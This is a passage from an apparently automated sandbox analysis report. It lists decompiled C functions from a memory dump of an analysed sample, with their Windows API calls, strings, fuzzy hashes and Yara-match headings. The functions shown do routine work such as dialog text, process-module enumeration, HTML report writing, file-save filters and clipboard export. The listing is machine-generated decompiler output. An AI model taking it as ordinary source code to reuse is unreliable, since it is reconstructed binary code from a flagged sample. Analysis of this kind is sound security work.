                                                                                • Instruction ID: f483db5831cad9889e7f207d848437a4a82f195d6e7bb7359e2425aa16285a4b
                                                                                • Opcode Fuzzy Hash: 20c5cb9973f99a89e878d6eee6cca72c3a181af6a96d535eb3513ac49921a140
                                                                                • Instruction Fuzzy Hash: 98011971281304BFFA321B60EE47FD97BA6EB48B00F014425F749A90E2CBF16860DA18
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 92%
                                                                                			E00407D0A(void* __eflags, struct HWND__* _a4) {
                                                                                				void _v4103;
                                                                                				char _v4104;
                                                                                				void* _t8;
                                                                                				void* _t17;
                                                                                
                                                                                				_t8 = E004118A0(0x1004, _t17);
                                                                                				_t21 =  *0x4171b8;
                                                                                				if( *0x4171b8 != 0) {
                                                                                					_v4104 = 0;
                                                                                					memset( &_v4103, 0, 0x1000);
                                                                                					sprintf(0x4172c0, "dialog_%d",  *0x417300);
                                                                                					if(E00407DE5(_t17, _t21, "caption",  &_v4104) != 0) {
                                                                                						SetWindowTextA(_a4,  &_v4104);
                                                                                					}
                                                                                					return EnumChildWindows(_a4, E00407CAD, 0);
                                                                                				}
                                                                                				return _t8;
                                                                                			}








                                                                                APIs
                                                                                • memset.MSVCRT ref: 00407D35
                                                                                • sprintf.MSVCRT ref: 00407D4A
                                                                                  • Part of subcall function 00407DE5: memset.MSVCRT ref: 00407E09
                                                                                  • Part of subcall function 00407DE5: GetPrivateProfileStringA.KERNEL32(004172C0,0000000A,00412466,?,00001000,004171B8), ref: 00407E2B
                                                                                  • Part of subcall function 00407DE5: strcpy.MSVCRT(?,?), ref: 00407E45
                                                                                • SetWindowTextA.USER32(?,?), ref: 00407D71
                                                                                • EnumChildWindows.USER32 ref: 00407D81
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindowssprintfstrcpy
                                                                                • String ID: caption$dialog_%d
                                                                                • API String ID: 246480800-4161923789
                                                                                • Opcode ID: 9cc970e277697b76041602e023995f54401f13df9d738430129227da823c9158
                                                                                • Instruction ID: 1b9ef3c80e7b29f71c03deb4ce56ff4662aaf0b85baafec8cd622ba642293ebf
                                                                                • Opcode Fuzzy Hash: 9cc970e277697b76041602e023995f54401f13df9d738430129227da823c9158
                                                                                • Instruction Fuzzy Hash: 40F02B305482887EEB12AB91DC06FE83B685F08786F0040B6BB44E11E0D7F85AC0C71E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 35%
                                                                                			E0040E255(void* __ecx, void* __eflags, long _a4, intOrPtr _a8) {
                                                                                				void* _v8;
                                                                                				signed int _v12;
                                                                                				unsigned int _v16;
                                                                                				int _v20;
                                                                                				intOrPtr _v28;
                                                                                				char _v32;
                                                                                				intOrPtr _v40;
                                                                                				intOrPtr _v44;
                                                                                				char _v308;
                                                                                				intOrPtr _v312;
                                                                                				void _v316;
                                                                                				void _v579;
                                                                                				char _v580;
                                                                                				char _v844;
                                                                                				intOrPtr _v1104;
                                                                                				intOrPtr _v1108;
                                                                                				intOrPtr _v1112;
                                                                                				char _v1132;
                                                                                				char _v17516;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* _t63;
                                                                                				void* _t64;
                                                                                				void* _t77;
                                                                                				intOrPtr _t84;
                                                                                				void _t94;
                                                                                				int _t102;
                                                                                				void* _t106;
                                                                                				void* _t107;
                                                                                
                                                                                				E004118A0(0x446c, __ecx);
                                                                                				_t102 = 0;
                                                                                				_v20 = 0;
                                                                                				if(E0040629C() == 0 ||  *0x417518 == 0) {
                                                                                					if( *0x417514 != _t102) {
                                                                                						_t94 = _a4;
                                                                                						_t63 =  *0x416fe0(8, _t94);
                                                                                						_v8 = _t63;
                                                                                						if(_t63 != 0xffffffff) {
                                                                                							_v20 = 1;
                                                                                							_v1132 = 0x224;
                                                                                							_t64 =  *0x416fd8(_t63,  &_v1132);
                                                                                							while(_t64 != 0) {
                                                                                								memset( &_v316, _t102, 0x118);
                                                                                								_v312 = _v1104;
                                                                                								_v316 = _t94;
                                                                                								strcpy( &_v308,  &_v844);
                                                                                								_v44 = _v1108;
                                                                                								_t107 = _t107 + 0x14;
                                                                                								_v40 = _v1112;
                                                                                								_v1132 = 0x224;
                                                                                								if(E0040E45F(_a8,  &_v316) != 0) {
                                                                                									_t64 =  *0x416fd4(_v8,  &_v1132);
                                                                                									continue;
                                                                                								}
                                                                                								goto L18;
                                                                                							}
                                                                                							goto L18;
                                                                                						}
                                                                                					}
                                                                                				} else {
                                                                                					_t77 = OpenProcess(0x410, 0, _a4);
                                                                                					_v8 = _t77;
                                                                                					if(_t77 != 0) {
                                                                                						_push( &_v16);
                                                                                						_push(0x4000);
                                                                                						_push( &_v17516);
                                                                                						_push(_t77);
                                                                                						if( *0x416fe4() != 0) {
                                                                                							_t6 =  &_v16;
                                                                                							 *_t6 = _v16 >> 2;
                                                                                							_v20 = 1;
                                                                                							_v12 = 0;
                                                                                							if( *_t6 != 0) {
                                                                                								while(1) {
                                                                                									_v580 = 0;
                                                                                									memset( &_v579, _t102, 0x104);
                                                                                									memset( &_v316, _t102, 0x118);
                                                                                									_t84 =  *((intOrPtr*)(_t106 + _v12 * 4 - 0x4468));
                                                                                									_t107 = _t107 + 0x18;
                                                                                									_v316 = _a4;
                                                                                									_v312 = _t84;
                                                                                									 *0x416fdc(_v8, _t84,  &_v580, 0x104);
                                                                                									E0040E172( &_v308,  &_v580);
                                                                                									_push(0xc);
                                                                                									_push( &_v32);
                                                                                									_push(_v312);
                                                                                									_push(_v8);
                                                                                									if( *0x416fe8() != 0) {
                                                                                										_v44 = _v28;
                                                                                										_v40 = _v32;
                                                                                									}
                                                                                									if(E0040E45F(_a8,  &_v316) == 0) {
                                                                                										goto L18;
                                                                                									}
                                                                                									_v12 = _v12 + 1;
                                                                                									if(_v12 < _v16) {
                                                                                										_t102 = 0;
                                                                                										continue;
                                                                                									} else {
                                                                                									}
                                                                                									goto L18;
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						L18:
                                                                                						CloseHandle(_v8);
                                                                                					}
                                                                                				}
                                                                                				return _v20;
                                                                                			}

































                                                                                APIs
                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040DD5F,00000000,00000000), ref: 0040E28C
                                                                                • memset.MSVCRT ref: 0040E2E9
                                                                                • memset.MSVCRT ref: 0040E2FB
                                                                                  • Part of subcall function 0040E172: strcpy.MSVCRT(?,-00000001), ref: 0040E198
                                                                                • memset.MSVCRT ref: 0040E3E2
                                                                                • strcpy.MSVCRT(?,?,?,00000000,00000118), ref: 0040E407
                                                                                • CloseHandle.KERNEL32(00000000,0040DD5F,?), ref: 0040E451
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$strcpy$CloseHandleOpenProcess
                                                                                • String ID:
                                                                                • API String ID: 3799309942-0
                                                                                • Opcode ID: 090a920ccff3a4e303efb007cbafe5d1b02941aedbce4837af1c52a6e7a2511d
                                                                                • Instruction ID: 14fca006082a3f7ea55a807dd49808cd12c96cdbdfea8439eb00a9ee5a281ce1
                                                                                • Opcode Fuzzy Hash: 090a920ccff3a4e303efb007cbafe5d1b02941aedbce4837af1c52a6e7a2511d
                                                                                • Instruction Fuzzy Hash: A2512DB1900218ABDB10DF95DC85ADEBBB8FF44304F1045AAF609B6291D7749F90CF69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 61%
                                                                                			E00409369(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                				signed int _v8;
                                                                                				char* _v12;
                                                                                				signed int _v16;
                                                                                				signed int _v20;
                                                                                				signed int _v24;
                                                                                				signed int _v28;
                                                                                				char _v48;
                                                                                				char _v68;
                                                                                				void _v96;
                                                                                				void* __edi;
                                                                                				signed int _t51;
                                                                                				char* _t53;
                                                                                				char* _t63;
                                                                                				intOrPtr* _t69;
                                                                                				signed int _t70;
                                                                                				char _t84;
                                                                                				intOrPtr* _t91;
                                                                                				signed int _t95;
                                                                                				void* _t96;
                                                                                				void* _t97;
                                                                                
                                                                                				_t69 = __ebx;
                                                                                				_t70 = 6;
                                                                                				memcpy( &_v96, "<td bgcolor=#%s nowrap>%s", _t70 << 2);
                                                                                				_t97 = _t96 + 0xc;
                                                                                				asm("movsw");
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				asm("movsw");
                                                                                				asm("movsb");
                                                                                				E00405EFD(_a4, "<tr>");
                                                                                				_t95 = 0;
                                                                                				if( *((intOrPtr*)(__ebx + 0x20)) > 0) {
                                                                                					do {
                                                                                						_t51 =  *( *((intOrPtr*)(_t69 + 0x24)) + _t95 * 4);
                                                                                						_v8 = _t51;
                                                                                						_t53 =  &_v96;
                                                                                						if( *((intOrPtr*)((_t51 << 4) +  *((intOrPtr*)(_t69 + 0x34)) + 4)) == 0) {
                                                                                							_t53 =  &_v48;
                                                                                						}
                                                                                						_t91 = _a8;
                                                                                						_v28 = _v28 | 0xffffffff;
                                                                                						_v24 = _v24 | 0xffffffff;
                                                                                						_v20 = _v20 | 0xffffffff;
                                                                                						_v16 = _v16 & 0x00000000;
                                                                                						_v12 = _t53;
                                                                                						 *((intOrPtr*)( *_t69 + 0x30))(4, _t95, _t91,  &_v28);
                                                                                						E0040F071(_v28,  &_v68);
                                                                                						E0040F09D( *((intOrPtr*)( *_t91))(_v8,  *(_t69 + 0x4c)),  *(_t69 + 0x50));
                                                                                						 *((intOrPtr*)( *_t69 + 0x48))( *(_t69 + 0x50), _t91, _v8);
                                                                                						_t63 =  *(_t69 + 0x50);
                                                                                						_t84 =  *_t63;
                                                                                						if(_t84 == 0 || _t84 == 0x20) {
                                                                                							strcat(_t63, "&nbsp;");
                                                                                						}
                                                                                						E0040F126( &_v28,  *((intOrPtr*)(_t69 + 0x54)),  *(_t69 + 0x50));
                                                                                						sprintf( *(_t69 + 0x4c), _v12,  &_v68,  *((intOrPtr*)(_t69 + 0x54)));
                                                                                						E00405EFD(_a4,  *(_t69 + 0x4c));
                                                                                						_t97 = _t97 + 0x20;
                                                                                						_t95 = _t95 + 1;
                                                                                					} while (_t95 <  *((intOrPtr*)(_t69 + 0x20)));
                                                                                				}
                                                                                				return E00405EFD(_a4, 0x412b1c);
                                                                                			}

                                                                                APIs
                                                                                  • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                  • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,73B74DE0,00000000,?,?,004092ED,00000001,00412B1C,73B74DE0), ref: 00405F17
                                                                                • strcat.MSVCRT(?,&nbsp;), ref: 0040942E
                                                                                • sprintf.MSVCRT ref: 00409450
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileWritesprintfstrcatstrlen
                                                                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                • API String ID: 3813295786-4153097237
                                                                                • Opcode ID: de7b970c7ee51d784ccd368963446ea6545f22e24ac9db830538cbfa5b1be59e
                                                                                • Instruction ID: 5cc8281df9b45005db58bfc05dfa6f470ea1610febbae0d5d066e94f32a410cd
                                                                                • Opcode Fuzzy Hash: de7b970c7ee51d784ccd368963446ea6545f22e24ac9db830538cbfa5b1be59e
                                                                                • Instruction Fuzzy Hash: 0C316B31900208AFCF15DF94C8869DE7BB6FF44310F1041AAFD11AB2E2D776AA55DB84
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 73%
                                                                                			E00410A8A(void* __ecx, void* __eflags, intOrPtr* _a4, int _a8) {
                                                                                				void* _v8;
                                                                                				intOrPtr* _v12;
                                                                                				intOrPtr _v24;
                                                                                				intOrPtr _v28;
                                                                                				intOrPtr _v32;
                                                                                				intOrPtr _v288;
                                                                                				intOrPtr _v800;
                                                                                				char _v1568;
                                                                                				char _v1824;
                                                                                				intOrPtr _v1828;
                                                                                				intOrPtr _v1840;
                                                                                				intOrPtr _v1844;
                                                                                				intOrPtr _v2100;
                                                                                				intOrPtr _v2612;
                                                                                				char _v3124;
                                                                                				char _v3636;
                                                                                				intOrPtr _v3640;
                                                                                				void* _v5768;
                                                                                				char _v5796;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				char* _t39;
                                                                                				intOrPtr _t51;
                                                                                				int _t60;
                                                                                				intOrPtr* _t73;
                                                                                				int _t76;
                                                                                				void* _t80;
                                                                                
                                                                                				_t80 = __eflags;
                                                                                				E004118A0(0x16a0, __ecx);
                                                                                				_t39 = wcslen(_a8);
                                                                                				_t2 =  &(_t39[1]); // 0x1
                                                                                				_t76 = _t2;
                                                                                				_push(_t76);
                                                                                				L004115D0();
                                                                                				_t60 = 0;
                                                                                				_v8 = _t39;
                                                                                				 *_t39 = 0;
                                                                                				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t39, _t76, 0, 0);
                                                                                				_t77 =  &_v5796;
                                                                                				E0040FE05( &_v5796, _t80);
                                                                                				_v5796 = 0x4144ac;
                                                                                				E004104BC( &_v3636);
                                                                                				E004104BC( &_v1824);
                                                                                				_t73 = _a4;
                                                                                				_v3640 =  *((intOrPtr*)(_t73 + 4));
                                                                                				_v12 = _t73;
                                                                                				_a8 = strlen(_v8);
                                                                                				E0040FF76(_t47, _t77);
                                                                                				memcpy(_v5768, _v8, _a8);
                                                                                				E00410081(_t77, _t80);
                                                                                				_t51 =  *((intOrPtr*)(_t73 + 4));
                                                                                				_v1840 = _t51;
                                                                                				_v28 = _t51;
                                                                                				if(_v2100 != 0 || _v2612 != 0) {
                                                                                					if(_v1844 != _t60) {
                                                                                						if(_v1568 != _t60) {
                                                                                							E004060D0(0xff,  &_v3124,  &_v1568);
                                                                                							_t73 = _a4;
                                                                                							_v1828 = _v24;
                                                                                							_t60 = 0;
                                                                                						}
                                                                                						 *((intOrPtr*)( *_t73))( &_v3636);
                                                                                					}
                                                                                				}
                                                                                				if(_v288 != _t60 || _v800 != _t60) {
                                                                                					if(_v32 != _t60) {
                                                                                						 *((intOrPtr*)( *_t73))( &_v1824);
                                                                                					}
                                                                                				}
                                                                                				_push(_v8);
                                                                                				L004115D6();
                                                                                				return E0040FEED( &_v5796);
                                                                                			}

                                                                                APIs
                                                                                • wcslen.MSVCRT ref: 00410A9D
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00410AA6
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00410C2C,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,00410C2C,?,00000000), ref: 00410ABF
                                                                                  • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE1A
                                                                                  • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE38
                                                                                  • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE53
                                                                                  • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE7C
                                                                                  • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FEA0
                                                                                • strlen.MSVCRT ref: 00410B02
                                                                                  • Part of subcall function 0040FF76: ??3@YAXPAX@Z.MSVCRT ref: 0040FF81
                                                                                  • Part of subcall function 0040FF76: ??2@YAPAXI@Z.MSVCRT ref: 0040FF90
                                                                                • memcpy.MSVCRT ref: 00410B1C
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00410BAF
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                • String ID:
                                                                                • API String ID: 577244452-0
                                                                                • Opcode ID: eda384fdfc038d1513b3794fcc6cadf0bacc3feb473f8e14eb1b45133d0eb622
                                                                                • Instruction ID: 5b66efc9566b80317fa540751e9ebc59d69584110078b55da7be64cca713082c
                                                                                • Opcode Fuzzy Hash: eda384fdfc038d1513b3794fcc6cadf0bacc3feb473f8e14eb1b45133d0eb622
                                                                                • Instruction Fuzzy Hash: 44317672804219AFCF21EFA1C8809EDBBB5AF44314F1440AAE508A3251DB796FC4CF98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040AB54(void* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                				char _v8;
                                                                                				intOrPtr _v12;
                                                                                				intOrPtr _v16;
                                                                                				intOrPtr _v20;
                                                                                				intOrPtr _v24;
                                                                                				intOrPtr _v28;
                                                                                				intOrPtr _v32;
                                                                                				char* _v36;
                                                                                				intOrPtr _v40;
                                                                                				char* _v44;
                                                                                				intOrPtr _v48;
                                                                                				intOrPtr _v52;
                                                                                				intOrPtr _v56;
                                                                                				intOrPtr _v60;
                                                                                				intOrPtr _v64;
                                                                                				intOrPtr _v68;
                                                                                				char _v72;
                                                                                				void _v1095;
                                                                                				char _v1096;
                                                                                				void* __ebx;
                                                                                				char _t29;
                                                                                				intOrPtr _t32;
                                                                                				intOrPtr _t35;
                                                                                				void* _t39;
                                                                                				void* _t52;
                                                                                				char _t59;
                                                                                				char* _t60;
                                                                                				intOrPtr _t61;
                                                                                
                                                                                				_v1096 = 0;
                                                                                				memset( &_v1095, 0, 0x3ff);
                                                                                				_v8 = 0x747874;
                                                                                				_t29 = E004078FF(0x1f5);
                                                                                				_t59 = "*.txt";
                                                                                				_v72 = _t29;
                                                                                				_v68 = _t59;
                                                                                				_v64 = E004078FF(0x1f6);
                                                                                				_v60 = _t59;
                                                                                				_v56 = E004078FF(0x1f7);
                                                                                				_v52 = _t59;
                                                                                				_t32 = E004078FF(0x1f8);
                                                                                				_t60 = "*.htm;*.html";
                                                                                				_v48 = _t32;
                                                                                				_v44 = _t60;
                                                                                				_v40 = E004078FF(0x1f9);
                                                                                				_v36 = _t60;
                                                                                				_v32 = E004078FF(0x1fa);
                                                                                				_v28 = "*.xml";
                                                                                				_t35 = E004078FF(0x1fb);
                                                                                				_t61 = "*.csv";
                                                                                				_v24 = _t35;
                                                                                				_v20 = _t61;
                                                                                				_v16 = E004078FF(0x1fc);
                                                                                				_v12 = _t61;
                                                                                				E0040684D( &_v1096,  &_v72, 8);
                                                                                				_t52 = 7;
                                                                                				_t39 = E004078FF(_t52);
                                                                                				_t23 =  &_v8; // 0x747874
                                                                                				return E00406680(_a8,  *((intOrPtr*)(_a4 + 0x108)), __edi,  &_v1096, _t39, _t23);
                                                                                			}

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040AB74
                                                                                  • Part of subcall function 004078FF: LoadStringA.USER32 ref: 004079C8
                                                                                  • Part of subcall function 004078FF: memcpy.MSVCRT ref: 00407A07
                                                                                  • Part of subcall function 004078FF: strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,73B74DE0), ref: 0040797A
                                                                                  • Part of subcall function 004078FF: strlen.MSVCRT ref: 00407998
                                                                                  • Part of subcall function 0040684D: memset.MSVCRT ref: 0040686D
                                                                                  • Part of subcall function 0040684D: sprintf.MSVCRT ref: 0040689A
                                                                                  • Part of subcall function 0040684D: strlen.MSVCRT ref: 004068A6
                                                                                  • Part of subcall function 0040684D: memcpy.MSVCRT ref: 004068BB
                                                                                  • Part of subcall function 0040684D: strlen.MSVCRT ref: 004068C9
                                                                                  • Part of subcall function 0040684D: memcpy.MSVCRT ref: 004068D9
                                                                                  • Part of subcall function 00406680: GetSaveFileNameA.COMDLG32(?), ref: 004066CF
                                                                                  • Part of subcall function 00406680: strcpy.MSVCRT(?,?), ref: 004066E6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memcpystrlen$memsetstrcpy$FileLoadNameSaveStringsprintf
                                                                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                • API String ID: 4021364944-3614832568
                                                                                • Opcode ID: 47d6f0de7c66cadcf7d9a44beb2654d42ee3cfb16f185572a55cd809b74eca63
                                                                                • Instruction ID: 4d38638b85bcf07ffefc140bede2392a268d493de89ddae44be4c2da79bd640a
                                                                                • Opcode Fuzzy Hash: 47d6f0de7c66cadcf7d9a44beb2654d42ee3cfb16f185572a55cd809b74eca63
                                                                                • Instruction Fuzzy Hash: B62101B2D442589ECB01FF99D8857DDBBB4BB04304F10417BE619B7282D7381A45CB5A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 72%
                                                                                			E00406491(void* __edx, struct HWND__* _a4) {
                                                                                				int _v8;
                                                                                				struct tagRECT _v24;
                                                                                				int _t17;
                                                                                				void* _t36;
                                                                                				struct HDC__* _t38;
                                                                                
                                                                                				_t36 = __edx;
                                                                                				_t38 = GetDC(0);
                                                                                				_t17 = GetDeviceCaps(_t38, 8);
                                                                                				_v8 = GetDeviceCaps(_t38, 0xa);
                                                                                				ReleaseDC(0, _t38);
                                                                                				GetWindowRect(_a4,  &_v24);
                                                                                				asm("cdq");
                                                                                				asm("cdq");
                                                                                				return MoveWindow(_a4, _v24.left - _v24.right + _t17 - 1 - _t36 >> 1, _v24.top - _v24.bottom + _v8 - 1 - _v8 >> 1, _v24.right - _v24.left + 1, _v24.bottom - _v24.top + 1, 1);
                                                                                			}

                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 0040649C
                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 004064AD
                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004064B4
                                                                                • ReleaseDC.USER32 ref: 004064BC
                                                                                • GetWindowRect.USER32 ref: 004064C9
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00406507
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CapsDeviceWindow$MoveRectRelease
                                                                                • String ID:
                                                                                • API String ID: 3197862061-0
                                                                                • Opcode ID: 69bb305ff33d1457d4484e576323a0ef66f31560397ccb35d966ff8f0e758d9b
                                                                                • Instruction ID: 542b186de9fc11de55873c3549d90df3c6ab5362d14aa96611489808ae4c73e2
                                                                                • Opcode Fuzzy Hash: 69bb305ff33d1457d4484e576323a0ef66f31560397ccb35d966ff8f0e758d9b
                                                                                • Instruction Fuzzy Hash: FC117C31A0011AAFDB009BB9CE4DEEFBFB8EB84711F014165E901E7250D6B0AD01CBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 95%
                                                                                			E00403A8D(void* __ecx, void* __eflags, void* _a4, char* _a8) {
                                                                                				long _v8;
                                                                                				void _v8199;
                                                                                				char _v8200;
                                                                                				void _v24582;
                                                                                				short _v24584;
                                                                                
                                                                                				E004118A0(0x6004, __ecx);
                                                                                				_v24584 = 0;
                                                                                				memset( &_v24582, 0, 0x3ffe);
                                                                                				_v8200 = 0;
                                                                                				memset( &_v8199, 0, 0x1fff);
                                                                                				MultiByteToWideChar(0, 0, _a8, 0xffffffff,  &_v24584, 0x1fff);
                                                                                				WideCharToMultiByte(0xfde9, 0,  &_v24584, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
                                                                                				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
                                                                                			}

                                                                                APIs
                                                                                • memset.MSVCRT ref: 00403AB2
                                                                                • memset.MSVCRT ref: 00403ACB
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AE2
                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403B01
                                                                                • strlen.MSVCRT ref: 00403B13
                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403B24
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                • String ID:
                                                                                • API String ID: 1786725549-0
                                                                                • Opcode ID: f625be7e6fa724cc13b0b56902c1b33cd6369ef039f23dbe168f1e8392359ec1
                                                                                • Instruction ID: d8056d974a042835a8b53dd5956248081512f57f3cb7fafeec888b91cb2496ed
                                                                                • Opcode Fuzzy Hash: f625be7e6fa724cc13b0b56902c1b33cd6369ef039f23dbe168f1e8392359ec1
                                                                                • Instruction Fuzzy Hash: 6A1161B244012CBEFB009B94DD85DEB77ADEF08354F0041A6B70AD2091D6349F94CB78
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040AC8A(void* __eax, void* __ebx) {
                                                                                				char _v264;
                                                                                				char _v524;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				long _t13;
                                                                                				void* _t18;
                                                                                				int _t19;
                                                                                				long _t20;
                                                                                				void* _t27;
                                                                                				void* _t31;
                                                                                
                                                                                				_t27 = __ebx;
                                                                                				_t31 = __eax;
                                                                                				_t13 = GetTempPathA(0x104,  &_v524);
                                                                                				_t32 = _t13;
                                                                                				if(_t13 == 0) {
                                                                                					GetWindowsDirectoryA( &_v524, 0x104);
                                                                                				}
                                                                                				_v264 = 0;
                                                                                				GetTempFileNameA( &_v524, "cp", 0,  &_v264);
                                                                                				_t18 = E0040AC47(_t31, _t32,  &_v264, 2, 1);
                                                                                				if(_t18 != 0) {
                                                                                					_t19 = OpenClipboard( *(_t31 + 0x108));
                                                                                					_t34 = _t19;
                                                                                					if(_t19 == 0) {
                                                                                						_t20 = GetLastError();
                                                                                					} else {
                                                                                						_t20 = E00405FC6(_t27, 0x104, _t31, _t34,  &_v264);
                                                                                					}
                                                                                					if(_t20 != 0) {
                                                                                						E00405F41(_t20,  *(_t31 + 0x108));
                                                                                					}
                                                                                					return DeleteFileA( &_v264);
                                                                                				}
                                                                                				return _t18;
                                                                                			}

                                                                                APIs
                                                                                • GetTempPathA.KERNEL32(00000104,?), ref: 0040ACA4
                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040ACB6
                                                                                • GetTempFileNameA.KERNEL32(?,0041341C,00000000,?), ref: 0040ACD8
                                                                                • OpenClipboard.USER32(?), ref: 0040ACF8
                                                                                • GetLastError.KERNEL32 ref: 0040AD11
                                                                                • DeleteFileA.KERNEL32(00000000), ref: 0040AD2E
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                • String ID:
                                                                                • API String ID: 2014771361-0
                                                                                • Opcode ID: 04f759ef316dfc5a7bfb4e8c49b84bbeab9ff02a57951bdc03c1b9a7e5f51390
                                                                                • Instruction ID: 1632bef886f39339d389646b63a05c30f7573d4ca20e624e383ab74febbb07e7
                                                                                • Opcode Fuzzy Hash: 04f759ef316dfc5a7bfb4e8c49b84bbeab9ff02a57951bdc03c1b9a7e5f51390
                                                                                • Instruction Fuzzy Hash: E0118272504318ABDB209B60DD49FDB77BC9F14701F0001B6F689E2091DBB8DAD4CB29
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 86%
                                                                                			E00406585(char* __edi, intOrPtr _a4, signed int _a8) {
                                                                                				void _v259;
                                                                                				char _v260;
                                                                                				char* _t34;
                                                                                				signed int _t35;
                                                                                				void* _t36;
                                                                                				void* _t37;
                                                                                
                                                                                				_t34 = __edi;
                                                                                				_v260 = 0;
                                                                                				memset( &_v259, 0, 0xfe);
                                                                                				_t37 = _t36 + 0xc;
                                                                                				 *__edi = 0;
                                                                                				_t35 = 0;
                                                                                				do {
                                                                                					_push( *(_t35 + _a4) & 0x000000ff);
                                                                                					sprintf( &_v260, "%2.2X");
                                                                                					_t37 = _t37 + 0xc;
                                                                                					if(_t35 > 0) {
                                                                                						strcat(_t34, " ");
                                                                                					}
                                                                                					if(_a8 > 0) {
                                                                                						asm("cdq");
                                                                                						if(_t35 % _a8 == 0) {
